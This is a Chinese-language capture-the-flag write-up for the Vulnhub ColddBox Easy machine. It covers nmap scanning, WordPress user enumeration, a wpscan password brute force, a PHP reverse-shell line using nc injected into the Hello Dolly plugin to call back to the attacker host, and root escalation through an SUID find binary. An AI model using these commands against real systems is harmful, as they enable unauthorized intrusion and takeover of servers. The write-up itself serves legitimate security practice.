Vulnhub靶场之ColddBoxEasy
靶机下载地址:
本机kali地址:192.168.157.144
信息收集
查看目标ip地址和开放的端口号
nmap -sP 192.168.157.144/24
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:52 CST
Nmap scan report for 192.168.157.2
Host is up (0.00060s latency).
Nmap scan report for 192.168.157.133
Host is up (0.0021s latency).
Nmap scan report for 192.168.157.144
Host is up (0.00019s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 4.42 seconds
目标主机的ip地址是.133
nmap -A 192.168.157.133 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-07 20:53 CST
Nmap scan report for 192.168.157.133
Host is up (0.00066s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.1.31
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: ColddBox | One more machine
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4e:bf:98:c0:9b:c5:36:80:8c:96:e8:96:95:65:97:3b (RSA)
| 256 88:17:f1:a8:44:f7:f8:06:2f:d3:4f:73:32:98:c7:c5 (ECDSA)
|_ 256 f2:fc:6c:75:08:20:b1:b2:51:2d:94:d6:94:d7:51:4f (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目标主机开放了80和4512端口,其中4512端口是ssh服务
先去看看80端口
可以发现该网站模板是wordpress,查询一下该模板的详细信息
wpscan --url http://192.168.157.133
扫了一下后台,有个wp-login.php的登录页面,这里我用wpscan去爆破用户名
wpscan --url http://192.168.157.133 -e u
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
发现有4个用户名,不过我这里用了下面三个用户名组成一个用户名字典,用rockyou字典去爆破wp-login页面的表单
wpscan --url http://192.168.157.133 -U user.txt -P /usr/share/wordlists/rockyou.txt
[SUCCESS] - c0ldd / 9876543210
爆破出来了一个,其实到这就可以结束了,后面我也没试过还能不能爆出其他的用户名和密码,因为没有意义了。
接下来用该用户登录
登录成功,并且非常幸运,这是个管理员的账号。
到处看看,重点就是这个plugins标签
这两个貌似是某种插件吧,这里我利用的是hello dolly这个插件,因为这个用起来很简单很方便,先点击activate,再点击edit,发现是用php写的
function hello_dolly_get_lyric() {
/** These are the lyrics to Hello Dolly */
$lyrics = "Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
So, take her wrap, fellas
Find her an empty lap, fellas
Dolly'll never go away again
Hello, Dolly
Well, hello, Dolly
It's so nice to have you back where you belong
You're lookin' swell, Dolly
I can tell, Dolly
You're still glowin', you're still crowin'
You're still goin' strong
We feel the room swayin'
While the band's playin'
One of your old favourite songs from way back when
Golly, gee, fellas
Find her a vacant knee, fellas
Dolly'll never go away
Dolly'll never go away
Dolly'll never go away again";
// Here we split it into lines
$lyrics = explode( "\n", $lyrics );
// And then randomly choose a line
return wptexturize( $lyrics[ mt_rand( 0, count( $lyrics ) - 1 ) ] );
}
// This just echoes the chosen line, we'll position it later
function hello_dolly() {
$chosen = hello_dolly_get_lyric();
echo "<p id='dolly'>$chosen</p>";
}
// Now we set that function up to execute when the admin_notices action is called
add_action( 'admin_notices', 'hello_dolly' );
// We need some CSS to position the paragraph
function dolly_css() {
// This makes sure that the positioning is also good for right-to-left languages
$x = is_rtl() ? 'left' : 'right';
echo "
<style type='text/css'>
#dolly {
float: $x;
padding-$x: 15px;
padding-top: 5px;
margin: 0;
font-size: 11px;
}
</style>
";
}
add_action( 'admin_head', 'dolly_css' );
?>
简单来讲这段代码的含义就是先将lyrics这个变量以换行符分割称数组,然后随机将数组里的某个下标的字符串输出到相应页面的右上角
GET SHELL
将恶意代码添加到该插件中,让其反弹shell
system("rm /tmp/bd;mkfifo /tmp/bd;cat /tmp/bd | /bin/bash -i 2>&1 | nc 192.168.157.144 1234 >/tmp/bd");
写入成功后保存,然后不断刷新页面.
成功拿到shell
提权
sudo -l这条命令用不了,这里我利用find命令去找带有suid的其他命令
find / -perm -u=s -type f 2>/dev/null
然后发现了这个
激动的心颤抖的手,感觉去tmp目录下
www-data@ColddBox-Easy:/tmp$ touch test
touch test
www-data@ColddBox-Easy:/tmp$ find test -exec whoami \;
find test -exec whoami \;
root
成功提权
www-data@ColddBox-Easy:/tmp$ find test -exec cat /root/root.txt \;
find test -exec cat /root/root.txt \;
wqFGZWxpY2lkYWRlcywgbcOhcXVpbmEgY29tcGxldGFkYSE=
总结
比较简单,但感觉这个靶机应该会有比较多不同的做法,因为感觉很多东西没有用到,像之前的ssh服务,网站根目录下有个hidden文件夹…
还有就是最后用find命令提权那里,如果把whoami改成/bin/bash的话权限是不变的,不知道为啥。。。